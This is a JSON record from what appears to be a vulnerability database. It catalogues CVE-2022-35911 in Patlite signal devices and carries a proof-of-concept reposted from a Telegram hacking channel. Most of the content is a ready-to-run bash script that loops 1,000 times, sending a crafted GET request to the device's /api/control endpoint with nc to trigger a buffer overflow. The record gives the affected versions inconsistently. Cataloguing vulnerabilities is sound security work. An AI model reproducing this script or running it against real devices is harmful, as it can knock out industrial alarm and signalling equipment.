{"uuid": "402898f3-6ce3-4a85-8731-7b30af14171c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-35911", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/62912", "content": "Exploit Collector\nPatlite 1.46 Buffer Overflow\n\nhttps://3.bp.blogspot.com/-3DxkerR7uq4/WWlu9h9UGfI/AAAAAAAAIJw/dRDCcwrw3XEGYQWUo-AXJEEU7FQ8iTgpACLcBGAs/s1600/h115.png \nPatlite versions 1.45 and below suffer from a buffer overflow vulnerability.\n\nSHA-256 | 5c29e3afa128083754b4bac9a8b929fac03751344f5c65c15f43df42fefcb136\n\nDownload\n# Exploit Title: CVE-2022-35911 - Patlite Overflow.\n# Date: 2022-07-07\n# Exploit Author: Samy Younsi - Necrum Security Labs\n# Vendor Homepage: https://www.patlite.co.jp\n# Software Link: https://www.patlite.co.jp/product/detail0000021462.html\n# Version: Versions 1.46 and bellow are affected\n# Tested on: CentOs &amp; Ubuntu\n# CVE : CVE-2022-35911\n#!/bin/bash\n\nIP=\"192.168.1.101\"\nPORT=\"80\"\n\nfor i in {0..1000}; \ndo \necho \"[$i]: \"; \necho -ne \"GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\\r\\nHost: $IP\\r\\n\\r\\n\" | nc $IP $PORT; \ndone &gt; /dev/null 2&gt;&amp;1\n\nSource:packetstormsecurity.com\n\n___________________________ \n@hacking_Attack\n@Hacking_Video", "creation_timestamp": "2026-09-06T00:00:44.346580Z"}